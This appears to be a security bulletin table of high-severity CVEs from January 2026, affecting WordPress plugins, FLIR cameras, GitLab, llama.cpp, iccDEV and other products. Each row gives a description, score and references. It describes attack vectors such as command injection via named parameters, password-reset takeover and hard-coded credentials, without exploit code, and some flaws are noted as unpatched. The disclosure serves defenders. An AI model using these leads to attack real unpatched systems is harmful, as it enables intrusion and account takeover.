| Digital zoom studio--DZS Video Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital zoom studio DZS Video Gallery allows Reflected XSS. This issue affects DZS Video Gallery: from n/a through 12.25. | 2026-01-07 | 7.1 | CVE-2025-32300 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| djanym--Optional Email | The Optional Email plugin for WordPress is vulnerable to Privilege Escalation via Account Takeover in all versions up to, and including, 1.3.11. This is due to the plugin not restricting its 'random_password' filter to registration contexts, allowing the filter to affect password reset key generation. This makes it possible for unauthenticated attackers to set a known password reset key when initiating a password reset, reset the password of any user including administrators, and gain access to their accounts. | 2026-01-07 | 9.8 | CVE-2025-15018 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4243e9-cf72-40d5-bc7d-204426024a1d?source=cve https://plugins.trac.wordpress.org/browser/optional-email/tags/1.3.11/optional-email.php?marks=44,51#L44 |
| e-plugins--JobBank | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins JobBank allows Reflected XSS. This issue affects JobBank: from n/a through 1.2.2. | 2026-01-06 | 7.1 | CVE-2025-69085 | https://patchstack.com/database/wordpress/plugin/jobbank/vulnerability/wordpress-jobbank-plugin-1-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| eastsidecode--WP Enable WebP | The WP Enable WebP plugin for WordPress is vulnerable to arbitrary file uploads due to improper file type validation in the 'wpse_file_and_ext_webp' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-07 | 8.8 | CVE-2025-15158 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fa53c5ee-fe7f-4fb2-baaa-2c1a151d4b2c?source=cve https://plugins.trac.wordpress.org/browser/wp-enable-webp/trunk/wp-enable-webp.php?rev=1998897#L43 |
| Elated-Themes--Frappé | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Frappé allows PHP Local File Inclusion. This issue affects Frappé: from n/a through 1.8. | 2026-01-06 | 8.1 | CVE-2025-69083 | https://patchstack.com/database/wordpress/theme/frappe/vulnerability/wordpress-frappe-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| Extreme Networks--Aerohive HiveOS | Aerohive HiveOS contains a denial of service vulnerability in the NetConfig UI that allows unauthenticated attackers to render the web interface unusable. Attackers can send a crafted HTTP request to the action.php5 script with specific parameters to trigger a 5-minute service disruption. | 2026-01-06 | 7.5 | CVE-2020-36907 | ExploitDB-48441 Extreme Networks Product Homepage HiveOS Product Announcements Zero Science Lab Disclosure (ZSL-2020-5566) NCSC Security Advisory IBM X-Force Vulnerability Exchange Packet Storm Security Exploit Entry VulnCheck Advisory: Extreme Networks Aerohive HiveOS <=11.x 11.x Unauthenticated Remote Denial of Service |
| FIBAR GROUP S.A.--Home Center 3 | FIBARO System Home Center 5.021 contains a remote file inclusion vulnerability in the undocumented proxy API that allows attackers to include arbitrary client-side scripts. Attackers can exploit the 'url' GET parameter to inject malicious JavaScript and potentially hijack user sessions or manipulate page content. | 2026-01-06 | 7.5 | CVE-2020-36905 | ExploitDB-48240 Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5563) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange VulnCheck Advisory: FIBARO System Home Center 5.021 Remote File Inclusion via Proxy API |
| FlagForgeCTF--flagForge | Flag Forge is a Capture The Flag (CTF) platform. Versions 2.3.2 and below have a Regular Expression Denial of Service (ReDoS) vulnerability in the user profile API endpoint (/api/user/[username]). The application constructs a regular expression dynamically using unescaped user input (the username parameter). An attacker can exploit this by sending a specially crafted username containing regex meta-characters (e.g., deeply nested groups or quantifiers), causing the MongoDB regex engine to consume excessive CPU resources. This can lead to Denial of Service for other users. The issue is fixed in version 2.3.3. To work around this issue, implement a Web Application Firewall (WAF) rule to block requests containing regex meta-characters in the URL path. | 2026-01-08 | 7.5 | CVE-2026-21868 | https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-949h-9824-xmcx |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D | FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains hard-coded SSH credentials that cannot be changed through normal camera operations. Attackers can leverage these persistent, unmodifiable credentials to gain unauthorized remote access to the thermal camera system. | 2026-01-07 | 7.5 | CVE-2017-20214 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42787 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D Stream | FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. Attackers can exploit the vulnerability to view unauthorized thermal camera video feeds across multiple camera series without requiring any authentication. | 2026-01-07 | 7.5 | CVE-2017-20213 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42789 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera FC-S/PT | FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64 contains an authenticated OS command injection vulnerability that allows attackers to execute shell commands with root privileges. Authenticated attackers can inject arbitrary shell commands through unvalidated input parameters to gain complete control of the thermal camera system. | 2026-01-07 | 8.8 | CVE-2017-20215 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42788 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera PT-Series | FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. Attackers can execute arbitrary system commands as root by exploiting unsanitized POST parameters in the execFlirSystem() function through shell_exec() calls. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-06 (UTC). | 2026-01-07 | 9.8 | CVE-2017-20216 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42785 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| frappe--frappe | Frappe is a full-stack web application framework. Versions 14.99.5 and below and 15.0.0 through 15.80.1 include requests that are vulnerable to path traversal attacks. Arbitrary files from the server could be retrieved due to a lack of proper sanitization on some requests. This issue is fixed in versions 14.99.6 and 15.88.1. As a workaround, changing the setup to use a reverse proxy is recommended. | 2026-01-05 | 7.5 | CVE-2025-68953 | https://github.com/frappe/frappe/security/advisories/GHSA-xj39-3g4p-f46v https://github.com/frappe/frappe/commit/3867fb112c3f7be1a863e40f19e9235719f784fb https://github.com/frappe/frappe/commit/959efd6a498cfaeaf7d4e0ab6cca78c36192d34d |
| Frenify--Arlo | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frenify Arlo allows Reflected XSS. This issue affects Arlo: from n/a through 6.0.3. | 2026-01-07 | 7.1 | CVE-2025-69082 | https://patchstack.com/database/wordpress/theme/arlo/vulnerability/wordpress-arlo-theme-6-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| fsylum--FS Registration Password | The FS Registration Password plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary users' passwords, including administrators', and leverage that to gain access to their accounts. | 2026-01-06 | 9.8 | CVE-2025-15001 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22351b90-fc34-44ce-9241-4a0f01eb7b1c?source=cve https://plugins.trac.wordpress.org/browser/registration-password/tags/1.0.1/src/WP/Auth.php https://plugins.trac.wordpress.org/changeset/3431651/registration-password |
| G5Theme--Handmade Framework | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in G5Theme Handmade Framework allows PHP Local File Inclusion. This issue affects Handmade Framework: from n/a through 3.9. | 2026-01-08 | 7.5 | CVE-2026-22521 | https://patchstack.com/database/wordpress/plugin/handmade-framework/vulnerability/wordpress-handmade-framework-plugin-3-9-local-file-inclusion-vulnerability?_s_id=cve |
| ggml-org--llama.cpp | llama.cpp is an inference engine for several LLM models in C/C++. In commits 55d4206c8 and prior, the n_discard parameter is parsed directly from JSON input in the llama.cpp server's completion endpoints without validation to ensure it is non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication. | 2026-01-07 | 8.8 | CVE-2026-21869 | https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an unauthenticated user to execute arbitrary code in the context of an authenticated user's browser by convincing the legitimate user to visit a specially crafted webpage. | 2026-01-09 | 8 | CVE-2025-13761 | GitLab Issue #582237 HackerOne Bug Bounty Report #3441368 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2.2 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to achieve stored cross-site scripting by exploiting GitLab Flavored Markdown. | 2026-01-09 | 8.7 | CVE-2025-9222 | GitLab Issue #562561 HackerOne Bug Bounty Report #3297483 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests. | 2026-01-09 | 7.1 | CVE-2025-13772 | GitLab Issue #581268 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| greenshot--greenshot | Greenshot is an open source Windows screenshot utility. Versions 1.3.310 and below are vulnerable to OS Command Injection through unsanitized filename processing. The FormatArguments method in ExternalCommandDestination.cs:269 uses string.Format() to insert user-controlled filenames directly into shell commands without sanitization, allowing attackers to execute arbitrary commands by crafting malicious filenames containing shell metacharacters. This issue is fixed in version 1.3.311. | 2026-01-08 | 7.8 | CVE-2026-22035 | https://github.com/greenshot/greenshot/security/advisories/GHSA-7hvw-q8q5-gpmj https://github.com/greenshot/greenshot/commit/5dedd5c9f0a9896fa0af1d4980d875a48bf432cb https://github.com/greenshot/greenshot/releases/tag/v1.3.311 |
| GT3 themes--Photo Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3 themes Photo Gallery allows Reflected XSS. This issue affects Photo Gallery: from n/a through 2.7.7.26. | 2026-01-06 | 7.1 | CVE-2025-69084 | https://patchstack.com/database/wordpress/plugin/gt3-photo-video-gallery/vulnerability/wordpress-photo-gallery-plugin-2-7-7-26-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Guangzhou V--V-SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains an open redirect vulnerability in the script that allows attackers to manipulate the 'parent' GET parameter. Attackers can craft malicious links that redirect logged-in users to arbitrary websites by exploiting improper input validation in the redirect mechanism. | 2026-01-07 | 9.8 | CVE-2019-25282 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry VSOL Vendor Homepage |
| Guangzhou Yeroo Tech Co., Ltd.--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a sensitive information disclosure vulnerability that allows remote attackers to intercept authentication credentials through cleartext cookie transmission. Attackers can exploit the autoSave feature to capture user passwords during man-in-the-middle attacks on HTTP communications. | 2026-01-06 | 7.5 | CVE-2020-36917 | Zero Science Lab Disclosure (ZSL-2020-5605) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry Archived Yeroo Tech Vendor Homepage VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Cleartext Password Disclosure via Cookie |
| haxtheweb--issues | HAX CMS helps manage a microsite universe with PHP or NodeJs backends. In versions from 11.0.6 before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0. | 2026-01-10 | 8.1 | CVE-2026-22704 | https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778 https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0 |
| IceWhaleTech--ZimaOS | ZimaOS is a fork of CasaOS, an operating system for Zima devices and x86-64 systems with UEFI. In versions up to and including 1.5.0, the application checks the validity of the username but appears to skip, misinterpret, or incorrectly validate the password when the provided username matches a known system service account. The application's login function fails to properly handle the password validation result for these users, effectively granting authenticated access to anyone who knows one of these common usernames and provides any password. As of the time of publication, no known patched versions are available. | 2026-01-08 | 9.4 | CVE-2026-21891 | https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4 |
| Infility--Infility Global | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infility Infility Global allows SQL Injection. This issue affects Infility Global: from n/a through 2.14.48. | 2026-01-05 | 9.3 | CVE-2025-68865 | https://vdp.patchstack.com/database/wordpress/plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-38-sql-injection-vulnerability?_s_id=cve |
| INIM Electronics s.r.l.--SmartLiving SmartLAN/G/SI | SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. Attackers can exploit the unsanitized parameter and system() function call to execute arbitrary system commands with root privileges using default credentials. | 2026-01-07 | 8.8 | CVE-2019-25289 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47765 Packet Storm Security Exploit File CXSecurity Vulnerability Issue IBM X-Force Vulnerability Exchange Entry Inim Vendor Homepage |
| INIM Electronics s.r.l.--Smartliving SmartLAN/G/SI | INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models. | 2026-01-07 | 7.5 | CVE-2019-25291 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47763 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry INIM Vendor Homepage |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a Use After Free vulnerability in the CIccXform::Create() function, where it deletes the hint. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 9.8 | CVE-2026-21675 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wcwx-794g-g78f https://github.com/InternationalColorConsortium/iccDEV/issues/182 https://github.com/InternationalColorConsortium/iccDEV/commit/510baf58fa48e00ebbb5dd577f0db4af8876bb31 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are prone to Undefined Behavior (UB) and Out of Memory errors. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 8.8 | CVE-2026-21485 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-chp2-4gv5-2432 https://github.com/InternationalColorConsortium/iccDEV/issues/340 https://github.com/InternationalColorConsortium/iccDEV/commit/c136aac51d25cbb4d9db63f071edad4f088843df |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have a Heap-based Buffer Overflow in its CIccMBB::Validate function which checks tag data validity. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 8.8 | CVE-2026-21676 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j5vv-p2hv-c392 https://github.com/InternationalColorConsortium/iccDEV/issues/215 https://github.com/InternationalColorConsortium/iccDEV/commit/e4c38a67d06073b38d58580b0cfc78ca61005f84 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have Undefined Behavior in its CIccCLUT::Init function which initializes and sets the size of a CLUT. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 8.8 | CVE-2026-21677 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-95w5-jvqf-3994 https://github.com/InternationalColorConsortium/iccDEV/issues/181 https://github.com/InternationalColorConsortium/iccDEV/commit/201125fbda22c8e4ea95800a6b427093fa4b8a22 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to a heap-buffer-overflow in CIccLocalizedUnicode::GetText(). This issue has been patched in version 2.3.1.2. | 2026-01-07 | 8.8 | CVE-2026-21679 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h4wg-473g-p5wc https://github.com/InternationalColorConsortium/iccDEV/issues/328 https://github.com/InternationalColorConsortium/iccDEV/pull/329 https://github.com/InternationalColorConsortium/iccDEV/commit/2eb25ab95f0db7664ec3850390b6f89e302e7039 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow in `CIccXmlArrayType::ParseText()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21682 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-jq9m-54gr-c56c https://github.com/InternationalColorConsortium/iccDEV/issues/178 https://github.com/InternationalColorConsortium/iccDEV/pull/229 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `icStatusCMM::CIccEvalCompare::EvaluateProfile()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21683 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-f2wp-j3fr-938w https://github.com/InternationalColorConsortium/iccDEV/issues/183 https://github.com/InternationalColorConsortium/iccDEV/pull/228 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `SIccCalcOp::ArgsPushed()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21688 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-3r2x-j7v3-pg6f https://github.com/InternationalColorConsortium/iccDEV/issues/379 https://github.com/InternationalColorConsortium/iccDEV/pull/422 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `ToXmlCurve()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21692 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7662-mf46-wr88 https://github.com/InternationalColorConsortium/iccDEV/issues/388 https://github.com/InternationalColorConsortium/iccDEV/pull/432 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccSegmentedCurveXml::ToXml()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21693 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-v3q7-7hw6-6jq8 https://github.com/InternationalColorConsortium/iccDEV/issues/389 https://github.com/InternationalColorConsortium/iccDEV/pull/432 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `CIccProfileXml::ParseBasic()` at `IccXML/IccLibXML/IccProfileXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-22046 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7v4q-mhr2-hj7r https://github.com/InternationalColorConsortium/iccDEV/issues/448 https://github.com/InternationalColorConsortium/iccDEV/pull/451 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `SIccCalcOp::Describe()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-22047 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-22q7-8347-79m5 https://github.com/InternationalColorConsortium/iccDEV/issues/454 https://github.com/InternationalColorConsortium/iccDEV/pull/459 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `CIccCLUT::Init()` at `IccProfLib/IccTagLut.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-08 | 8.8 | CVE-2026-22255 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-qv2w-mq3g-73gv https://github.com/InternationalColorConsortium/iccDEV/issues/466 https://github.com/InternationalColorConsortium/iccDEV/pull/469 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below contain Use After Free, Heap-based Buffer Overflow, Integer Overflow or Wraparound, and Out-of-bounds Write vulnerabilities in its CIccSparseMatrix::CIccSparseMatrix function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 7.8 | CVE-2026-21486 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mg98-j5q2-674w https://github.com/InternationalColorConsortium/iccDEV/commit/1ab7363f38a20089934d3410c88f714eea392bf5 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have an infinite loop in the CalcProfileID function in IccProfile.cpp. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 7.5 | CVE-2026-21507 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hgp5-r8m9-8qpj https://github.com/InternationalColorConsortium/iccDEV/issues/244 https://github.com/InternationalColorConsortium/iccDEV/commit/3f3ce789d0d2b608c194ed172fa38943519dc198 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have overflows and underflows in CIccXmlArrayType::ParseTextCountNum(). This vulnerability affects users of the iccDEV library who process ICC color profiles. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 7.8 | CVE-2026-21673 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-g66g-f82c-vgm6 https://github.com/InternationalColorConsortium/iccDEV/issues/243 https://github.com/InternationalColorConsortium/iccDEV/commit/32740802ee14418bd14c429d7e2f142d92cd5c4f |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has a heap-buffer-overflow vulnerability in IccTagXml(). This issue has been patched in version 2.3.1.2. | 2026-01-07 | 7.8 | CVE-2026-21678 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-9rp2-4c6g-hppf https://github.com/InternationalColorConsortium/iccDEV/issues/55 https://github.com/InternationalColorConsortium/iccDEV/pull/219 https://github.com/InternationalColorConsortium/iccDEV/commit/c6c0f1cf45b48db94266132ccda5280a1a33569d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have an Undefined Behavior runtime error. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21681 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-v4qq-v3c3-x62x https://github.com/InternationalColorConsortium/iccDEV/pull/269 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagSpectralViewingConditions()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21684 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-fg9m-j9x8-8279 https://github.com/InternationalColorConsortium/iccDEV/issues/216 https://github.com/InternationalColorConsortium/iccDEV/pull/225 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagLut16::Read()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21685 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c3xr-6687-5c8p https://github.com/InternationalColorConsortium/iccDEV/issues/213 https://github.com/InternationalColorConsortium/iccDEV/pull/223 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagLutAtoB::Validate()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21686 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-792q-cqq9-mq4x https://github.com/InternationalColorConsortium/iccDEV/issues/214 https://github.com/InternationalColorConsortium/iccDEV/pull/222 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagCurve::CIccTagCurve()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21687 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-prmm-g479-4fv7 https://github.com/InternationalColorConsortium/iccDEV/issues/180 https://github.com/InternationalColorConsortium/iccDEV/pull/221 |
| ipaymu--iPaymu Payment Gateway for WooCommerce | The iPaymu Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 2.0.2 via the 'check_ipaymu_response' function. This is due to the plugin not validating webhook request authenticity through signature verification or origin checks. This makes it possible for unauthenticated attackers to mark WooCommerce orders as paid by sending crafted POST requests to the webhook endpoint without any payment occurring, as well as enumerate order IDs and obtain valid order keys via GET requests, exposing customer order PII including names, addresses, and purchased products. | 2026-01-07 | 8.2 | CVE-2026-0656 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e639aed-ec67-4212-9051-1f7465bbfde2?source=cve https://plugins.trac.wordpress.org/browser/ipaymu-for-woocommerce/tags/2.0.2/gateway.php?marks=316-336,370-380#L316 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429657%40ipaymu-for-woocommerce&new=3429657%40ipaymu-for-woocommerce |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cleartext password storage vulnerability that allows attackers to access unencrypted credentials in the device's SQLite database. Attackers can directly read sensitive login information stored in /faceGuard/database/FaceSentryWeb.sqlite without additional authentication. | 2026-01-07 | 8.2 | CVE-2019-25279 | Zero Science Lab Vulnerability Advisory IBM X-Force Exchange Vulnerability Entry Packet Storm Security Exploit Entry |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cleartext transmission vulnerability that allows remote attackers to intercept authentication credentials. Attackers can perform man-in-the-middle attacks to capture HTTP cookie authentication information during network communication. | 2026-01-07 | 7.5 | CVE-2019-25278 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry |
| JanStudio--Gecko | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in JanStudio Gecko allows PHP Local File Inclusion. This issue affects Gecko: from n/a through 1.9.8. | 2026-01-07 | 8.1 | CVE-2025-69080 | https://patchstack.com/database/wordpress/theme/gecko/vulnerability/wordpress-gecko-theme-1-9-8-local-file-inclusion-vulnerability?_s_id=cve |
